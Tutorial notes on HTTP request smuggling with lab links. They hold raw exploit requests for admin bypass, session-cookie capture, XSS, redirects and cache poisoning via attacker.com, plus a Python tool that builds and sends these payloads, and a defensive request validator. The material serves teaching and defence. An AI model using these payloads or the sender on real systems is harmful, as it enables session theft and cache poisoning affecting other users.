Detailed notes + labs: HTTP Request Smuggling
Word count: 1334  2025-08-15 21:31:27
A Complete Guide to HTTP Request Smuggling Attacks
1. Overview of HTTP Request Smuggling
HTTP Request Smuggling is an attack technique that exploits differences in how a front-end server (a load balancer or reverse proxy) and a back-end server parse HTTP requests. By crafting a specially formatted request, the attacker makes the front end and the back end disagree about where one request ends and the next begins, and can thereby bypass security controls or interfere with other users' requests.
Key characteristics:
- The front end enforces the security controls; the back end trusts whatever the front end forwards without further checks
- The front-end/back-end split is the norm in modern cloud architectures
- The attack works because the front end sends many users' requests over the same reused back-end connection
2. Why the vulnerability exists
The HTTP/1.1 specification provides two ways to indicate where a request body ends, and they can conflict:
- Content-Length (CL) header: states the body length in bytes directly
POST /search HTTP/1.1
Content-Length: 11

q=smuggling
- Transfer-Encoding (TE) header: uses chunked encoding, where each chunk is prefixed by its size in hexadecimal and the body ends with a zero-length chunk (b is 11, the length of q=smuggling)
POST /search HTTP/1.1
Transfer-Encoding: chunked

b
q=smuggling
0

The specification says that when both headers are present Transfer-Encoding wins and Content-Length must be ignored, but not every server implements that rule.
Root causes:
- Some servers do not support the Transfer-Encoding header
- Some servers can be tricked by an obfuscated Transfer-Encoding header into not processing it
- The front end and the back end handle the ambiguous headers differently, so they disagree about where the request ends
3. Types of HTTP request smuggling
The byte counts in the examples below are taken from the source material; before sending anything, recompute Content-Length and chunk sizes from the exact bytes, counting every CRLF, because a wrong count turns a clean desync into a request that simply hangs.
3.1 GET request with a non-zero Content-Length
Scenario: the front end accepts a body on a GET request and forwards it, while the back end ignores the body of a GET. The body bytes are then read as the start of the next request on the connection.
GET / HTTP/1.1
Host: example.com
Content-Length: 44

GET /secret HTTP/1.1
Host: example.com
3.2 CL-CL (duplicate Content-Length)
The two servers pick different Content-Length headers (first versus last). Here the front end uses 8 and forwards the whole body; the back end uses 7 and leaves the trailing a on the connection, where it becomes the first byte of the next request.
POST / HTTP/1.1
Host: example.com
Content-Length: 8
Content-Length: 7

12345
a
3.3 CL-TE
The front end processes Content-Length, the back end processes Transfer-Encoding.
POST / HTTP/1.1
Host: example.com
Content-Length: 6
Transfer-Encoding: chunked

0

G
The front end forwards all 6 body bytes (0, CRLF, CRLF, G). The back end ends the request at the zero-length chunk, so G is left on the connection and is prepended to the next request, which the back end then reads as GPOST / HTTP/1.1 (an unknown method).
3.4 TE-CL
The front end processes Transfer-Encoding, the back end processes Content-Length.
POST / HTTP/1.1
Host: example.com
Content-Length: 4
Transfer-Encoding: chunked

12
GPOST / HTTP/1.1

0

The front end decodes one chunk of 0x12 = 18 bytes (GPOST / HTTP/1.1 plus CRLF) followed by the terminating chunk and forwards everything. The back end reads only the 4 bytes 12 plus CRLF as the body; the rest of the stream starts a new request, GPOST / HTTP/1.1.
3.5 TE-TE
Both servers process Transfer-Encoding, but one of them can be made to ignore an obfuscated form of the header; that server falls back to Content-Length, so the pair degrades to CL-TE or TE-CL. Typical obfuscations change the header name or value so that only one parser still recognises chunked encoding: a second Transfer-Encoding header with an unknown value as here, a misspelled or padded value, unusual whitespace around the name, or line folding.
POST / HTTP/1.1
Host: example.com
Content-length: 4
Transfer-Encoding: chunked
Transfer-encoding: cow

5c
GPOST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The chunk size 5c (92 bytes) covers everything from GPOST up to and including x=1.
4. Detection methods
4.1 Timing-based detection
Send a request that the front end treats as complete but that leaves the back end waiting for more bytes; a response that only arrives after a timeout shows that the two servers frame requests differently. Run the CL.TE probe first: the TE.CL probe sent to a site that is actually CL.TE vulnerable can disrupt other users' requests.
CL.TE detection:
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
Content-Length: 4

1
A
X
The front end forwards only the first 4 body bytes (1, CRLF, A); the back end reads a 1-byte chunk whose terminating CRLF never arrives and waits for it.
TE.CL detection:
POST / HTTP/1.1
Host: vulnerable.com
Transfer-Encoding: chunked
Content-Length: 6

0

X
The front end decodes the zero-length chunk and forwards only those 5 bytes; the back end expects a 6-byte body and waits for the sixth.
4.2 Confirmation via differential responses
Send the attack request and then, on a new connection, a normal request. If the normal request receives a response caused by the smuggled prefix (here a 404 for /404), the difference in behaviour confirms the vulnerability. Another user's request may arrive between the two and receive the poisoned response instead, so repeat the test a few times.
CL.TE confirmation:
POST /search HTTP/1.1
Content-Length: 50
Transfer-Encoding: chunked

e
q=smuggling&x=
0

GET /404 HTTP/1.1
Foo: x
The smuggled GET ends without a blank line, so the back end appends the first line of the next request to the Foo header and still serves the request as GET /404.
TE.CL confirmation:
POST /search HTTP/1.1
Content-Length: 4
Transfer-Encoding: chunked

7c
GET /404 HTTP/1.1
Host: vulnerable.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 144

x=
0

Here the smuggled request is complete, and its Content-Length: 144 is deliberately larger than the bytes that follow, so the back end swallows the start of the next request into its body.
5. Exploitation techniques
5.1 Bypassing front-end security controls
The front end blocks direct requests to /admin, but a request smuggled in the body of an allowed request reaches the back end without being checked. Host: localhost is used because, in the scenario these examples come from, the back end only permits admin access from local requests.
CL.TE exploitation:
POST /home HTTP/1.1
Content-Length: 60
Transfer-Encoding: chunked

0

GET /admin HTTP/1.1
Host: localhost
Foo: xGET /home HTTP/1.1
Host: example.com
The last two lines are not sent by the attacker: they show the next request on the connection being absorbed into the Foo header, so the back end processes GET /admin with Host: localhost.
TE.CL exploitation:
POST / HTTP/1.1
Content-length: 4
Transfer-Encoding: chunked

71
POST /admin HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The chunk size 71 (hex, 113 bytes) covers the whole smuggled request up to and including x=1. Content-Length: 15 on the smuggled request is larger than the 3-byte x=1, so the back end reads the chunk terminator and the first bytes of the next request as the rest of that body instead of leaving stray bytes on the connection.
5.2 Revealing front-end request rewriting
Front ends often add headers before forwarding (X-Forwarded-For, TLS details, internal user identifiers). Smuggle a request to an endpoint that reflects a parameter, with the reflected parameter last in the body and a Content-Length larger than the body, so that the next request, complete with the headers the front end added to it, lands inside the reflected value. Increase the Content-Length gradually: too large and the back end waits for bytes that never come.
POST / HTTP/1.1
Content-Length: 109
Transfer-Encoding: chunked

0

POST / HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 100

search=test
5.3 Capturing other users' requests
The same technique against an endpoint that stores the submitted value and shows it later (here a blog comment) captures the next user's request, including their Cookie header, into the stored comment. The comment parameter must be the last one in the body, and the smuggled Content-Length decides how many bytes of the victim's request are captured, so it usually needs tuning.
POST / HTTP/1.1
Content-Length: 259
Transfer-Encoding: chunked

0

POST /post/comment HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Content-Length: 600
Cookie: session=...

csrf=...&postId=4&name=joker&email=test@test.com&website=&comment=test
5.4 Exploiting reflected XSS
When a request header (here User-Agent) is reflected into the page, an ordinary reflected XSS would require the victim to send a crafted header, which a link cannot make them do. With smuggling, the attacker supplies the header in the smuggled request and the next user's response contains the injected script.
POST / HTTP/1.1
Host: example.com
Content-Length: 138
Transfer-Encoding: chunked

0

GET /post?postId=3 HTTP/1.1
User-Agent: "><script>alert(1)</script>#
5.5 Open redirect
Many servers redirect a request for a directory without a trailing slash (e.g. /home to /home/) and build the Location header from the Host header. Smuggling such a request with an attacker-controlled Host turns the next user's request into a redirect to attacker.com; if that request was for a JavaScript file, the attacker's server can answer with script that runs in the victim's browser.
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 54
Transfer-Encoding: chunked

0

GET /home HTTP/1.1
Host: attacker.com
Foo: X
5.6 Web cache poisoning
Combine the redirect above with a caching front end. The smuggled request makes the back end answer the next user's request (for a cacheable resource such as a JavaScript file) with a redirect to attacker.com; the cache stores that redirect under the URL of the victim's request, so every later user who fetches the resource is redirected, not just the one whose request was hijacked.
POST / HTTP/1.1
Host: vulnerable.com
Content-Length: 182
Transfer-Encoding: chunked

0

GET /post/next?postId=3 HTTP/1.1
Host: attacker.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 10

x=1
5.7 Web cache deception
The mirror image of poisoning: smuggle a request for a page containing the victim's private data (/my-account). The victim's request for a static, cacheable resource is absorbed into the X-Ignore header, the back end answers it with the victim's own account page (the victim's Cookie header arrives with the absorbed request), and the cache stores that page under the static URL, where the attacker can simply fetch it. Unlike poisoning, the attacker reads a cached response instead of planting one.
POST / HTTP/1.1
Host: example.com
Content-Length: 44
Transfer-Encoding: chunked

0

GET /my-account HTTP/1.1
X-Ignore: X
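Added example, not code from these notes or from PortSwigger: a Python builder and raw sender for the section 4 probes and the section 5 smuggling requests. It computes every Content-Length and chunk size from the exact bytes, which is the part hand-written payloads most often get wrong. The host lab.example, the port, the paths and the function names are placeholders chosen here; the claimed length 144 is the value from the 4.2 example. send_raw() and confirm_differential() need a lab target, everything else runs offline.

```python
"""Payload builder and raw sender for the probes in section 4 and the
smuggling requests in section 5. Added example, not code from the original
notes or from PortSwigger. Every Content-Length and chunk size is computed
from the exact bytes (the hand-written examples above are only approximate);
host names, ports and paths are placeholders for a lab target."""
import socket
import ssl
import time

CRLF = b"\r\n"


def inner_request(method: str, path: str, host: str, body: bytes = b"",
                  headers=None, claimed_length=None, terminate: bool = True) -> bytes:
    """Compose the request to smuggle.
    claimed_length > len(body): the back end keeps reading into whatever
      follows on the connection, i.e. the next user's request (5.2, 5.3).
    terminate=False: leave the header block open (body ignored), so the next
      request's first line is swallowed into the last header ('Foo: x', 4.2/5.1)."""
    hdrs = {"Host": host, **(headers or {})}
    if body or claimed_length is not None:
        hdrs.setdefault("Content-Type", "application/x-www-form-urlencoded")
        hdrs["Content-Length"] = str(len(body) if claimed_length is None else claimed_length)
    head = f"{method} {path} HTTP/1.1\r\n" + "\r\n".join(f"{k}: {v}" for k, v in hdrs.items())
    return head.encode() + (CRLF + CRLF + body if terminate else b"")


def wrapper(host: str, content_length: int, body: bytes, te: str = "chunked", path: str = "/") -> bytes:
    """Outer POST carrying both framing headers; `te` lets you try the
    obfuscated Transfer-Encoding values of 3.5 (e.g. 'xchunked')."""
    head = (f"POST {path} HTTP/1.1\r\nHost: {host}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n"
            f"Content-Length: {content_length}\r\nTransfer-Encoding: {te}\r\n\r\n")
    return head.encode() + body


def build_cl_te(host: str, smuggled: bytes, **kw) -> bytes:
    """Front end honours Content-Length, so it must cover the 0 chunk plus the
    smuggled bytes; the back end stops at the 0 chunk and leaves `smuggled`
    on the connection as the start of the next request."""
    body = b"0\r\n\r\n" + smuggled
    return wrapper(host, len(body), body, **kw)


def build_te_cl(host: str, smuggled: bytes, **kw) -> bytes:
    """Front end decodes the chunk, so its size must be exactly len(smuggled)
    in hex; the back end honours Content-Length, which covers only the
    chunk-size line, so the smuggled request is left on the connection."""
    size_line = f"{len(smuggled):x}\r\n".encode()
    return wrapper(host, len(size_line), size_line + smuggled + b"\r\n0\r\n\r\n", **kw)


def timing_probe(host: str, variant: str) -> bytes:
    """4.1 probes. CL.TE: front end forwards the 4 bytes '1\\r\\nA', back end
    waits for the rest of the chunk. TE.CL: front end forwards the 0 chunk,
    back end waits for 6 bytes but only gets 5."""
    if variant == "CL.TE":
        return wrapper(host, 4, b"1\r\nA\r\nX")
    if variant == "TE.CL":
        return wrapper(host, 6, b"0\r\n\r\nX")
    raise ValueError(variant)


def send_raw(host: str, port: int, payload: bytes, timeout: float = 10.0,
             use_tls: bool = False) -> tuple[float, bytes, bool]:
    """Send raw bytes on a fresh connection; return (seconds, first response
    bytes, timed_out). One recv is enough: the probe question is only whether
    anything comes back before the timeout."""
    sock = socket.create_connection((host, port), timeout=timeout)
    if use_tls:
        sock = ssl.create_default_context().wrap_socket(sock, server_hostname=host)
    start, response, timed_out = time.monotonic(), b"", False
    try:
        sock.sendall(payload)
        response = sock.recv(65536)
    except (socket.timeout, TimeoutError):
        timed_out = True
    finally:
        sock.close()
    return time.monotonic() - start, response, timed_out


def status_line(response: bytes) -> str:
    return response.split(CRLF, 1)[0].decode(errors="replace")


def confirm_differential(host: str, port: int, variant: str, use_tls: bool = False) -> str:
    """4.2: send the attack request, then a normal one on a new connection;
    a 404 on the second shows the smuggled 'GET /404' prefix was applied."""
    if variant == "CL.TE":
        prefix = inner_request("GET", "/404", host, headers={"Foo": "x"}, terminate=False)
        attack = build_cl_te(host, prefix)
    else:
        # complete request whose claimed length swallows the start of the next request
        attack = build_te_cl(host, inner_request("GET", "/404", host, body=b"x=", claimed_length=144))
    send_raw(host, port, attack, use_tls=use_tls)
    _, resp, _ = send_raw(host, port, inner_request("GET", "/", host), use_tls=use_tls)
    return status_line(resp)
```

For the section 5 exploits, pass inner_request(...) with the desired claimed_length to build_cl_te() or build_te_cl(); the wrapper lengths are then correct by construction, and the only value left to tune is the claimed length of the smuggled request. Timing detection is send_raw(host, port, timing_probe(host, "CL.TE")) and a check of the timed_out flag; send the CL.TE probe before the TE.CL one for the reason given in 4.1.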
6. Defences
- Disable back-end connection reuse: send every back-end request over its own connection, so there is no following request for smuggled bytes to attach to (this removes the impact but not the parsing difference, and is costly at scale)
- Use HTTP/2 end to end: its binary framing leaves no ambiguity about request boundaries; the protection is lost if the front end downgrades to HTTP/1.1 when talking to the back end, because the request is then re-framed with Content-Length or Transfer-Encoding
- Use the same web server software for front end and back end so both parse requests identically
- Normalise or reject ambiguous requests: the front end should normalise them (the specification already requires Content-Length to be ignored when Transfer-Encoding is present) and the back end should reject them rather than guess
- Validate headers strictly: reject requests with both framing headers, duplicate Content-Length headers, Transfer-Encoding values other than chunked, or malformed header syntax (whitespace before the colon, line folding, bare LF line endings)
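Added example, not code from these notes or from any particular server: a Python admission check implementing the "reject ambiguous requests" and "strict header validation" items above. It parses the request head the way a strict front end should (the rules follow RFC 9112 section 6.3 on message body length; refusing GET bodies and any Transfer-Encoding other than a plain chunked is a policy choice, stricter than the RFC) and runs over constructed samples that reuse the patterns from sections 3 and 4; the sample names are chosen here.

```python
"""Admission check a front end can apply before forwarding, implementing the
'reject ambiguous requests' and 'strict header validation' items above.
Added example, not code from the original notes or from any particular
server; the rules follow RFC 9112 section 6.3 (message body length) and the
sample requests are constructed from the patterns in sections 3 and 4."""
import re

TOKEN = re.compile(rb"^[!#$%&'*+\-.^_`|~0-9A-Za-z]+$")  # RFC 9110 token: a valid header name


def parse_head(raw: bytes):
    """Split a request into (request-line parts, [(name, value)], body).
    Raises ValueError for the syntax tricks smuggling relies on."""
    end = raw.find(b"\r\n\r\n")
    if end < 0:
        raise ValueError("no CRLFCRLF terminating the header block")
    head = raw[:end]
    if b"\n" in head.replace(b"\r\n", b""):
        raise ValueError("bare LF in header block")  # parsers disagree on LF-only line ends
    lines = head.split(b"\r\n")
    parts = lines[0].split(b" ")
    if len(parts) != 3 or parts[2] not in (b"HTTP/1.0", b"HTTP/1.1"):
        raise ValueError("malformed request line")
    headers = []
    for line in lines[1:]:
        if line[:1] in (b" ", b"\t"):
            raise ValueError("obsolete line folding")  # a continuation line hides a header from one parser
        name, sep, value = line.partition(b":")
        if not sep or not TOKEN.match(name):
            raise ValueError("malformed header name: %r" % name)  # e.g. 'Transfer-Encoding : chunked'
        headers.append((name.lower(), value.strip(b" \t")))
    return parts, headers, raw[end + 4:]


def check_request(raw: bytes) -> tuple[bool, str]:
    """Return (accept, reason). Anything where two plausible parsers could pick
    different request boundaries is rejected outright rather than normalised,
    so the back end never sees the ambiguity."""
    try:
        (method, _, _), headers, _ = parse_head(raw)
    except ValueError as exc:
        return False, str(exc)
    lengths = [v for n, v in headers if n == b"content-length"]
    codings = [v for n, v in headers if n == b"transfer-encoding"]
    if lengths and codings:
        return False, "both Content-Length and Transfer-Encoding present"
    if len(lengths) > 1:
        return False, "multiple Content-Length headers"
    if lengths and not lengths[0].isdigit():
        return False, "non-numeric Content-Length"
    if len(codings) > 1:
        return False, "multiple Transfer-Encoding headers"
    if codings and [c.strip().lower() for c in codings[0].split(b",")] != [b"chunked"]:
        # stricter than the RFC, which allows other codings before a final 'chunked';
        # accepting only the exact value leaves no room for obfuscated variants
        return False, f"unsupported Transfer-Encoding value {codings[0]!r}"
    if method in (b"GET", b"HEAD") and (codings or (lengths and int(lengths[0]) > 0)):
        return False, f"body not allowed on {method.decode()}"  # policy choice, see 3.1
    return True, "ok"


# Constructed samples, keyed by the pattern each one exercises.
SAMPLES = {
    "clean-cl": b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 3\r\n\r\nx=1",
    "clean-te": b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "cl-cl": b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 8\r\nContent-Length: 7\r\n\r\n12345\r\na",
    "cl-te": b"POST / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 6\r\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\nG",
    "te-te": b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding: chunked\r\nTransfer-encoding: cow\r\n\r\n0\r\n\r\n",
    "te-obfuscated": b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding: xchunked\r\n\r\n0\r\n\r\n",
    "space-before-colon": b"POST / HTTP/1.1\r\nHost: example.com\r\nTransfer-Encoding : chunked\r\n\r\n0\r\n\r\n",
    "obs-fold": b"POST / HTTP/1.1\r\nHost: example.com\r\nX-Ignore: a\r\n Transfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "bare-lf": b"POST / HTTP/1.1\r\nHost: example.com\nTransfer-Encoding: chunked\r\n\r\n0\r\n\r\n",
    "get-with-body": b"GET / HTTP/1.1\r\nHost: example.com\r\nContent-Length: 44\r\n\r\nGET /secret HTTP/1.1\r\n",
}


def audit(samples: dict) -> dict:
    """Map each sample name to the reason check_request gives for it."""
    return {name: check_request(raw)[1] for name, raw in samples.items()}


if __name__ == "__main__":
    for name, reason in audit(SAMPLES).items():
        print(f"{name:20} {reason}")
```

Only the two clean samples pass; every pattern from sections 3 and 4, plus the header-syntax tricks used for TE-TE obfuscation, is refused with a specific reason, which is also what you want logged by a front end so that smuggling attempts show up in monitoring.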
7. Labs and practice
The labs referred to in these notes are available in the PortSwigger Web Security Academy:
- CL-TE basic lab:
https://portswigger.net/web-security/request-smuggling/lab-basic-cl-te
- TE-CL basic lab:
https://portswigger.net/web-security/request-smuggling/lab-basic-te-cl
- TE-TE obfuscation lab:
https://portswigger.net/web-security/request-smuggling/lab-obfuscating-te-header
Working through these labs hands-on is the best way to understand the concrete scenarios and exploitation methods of each smuggling technique.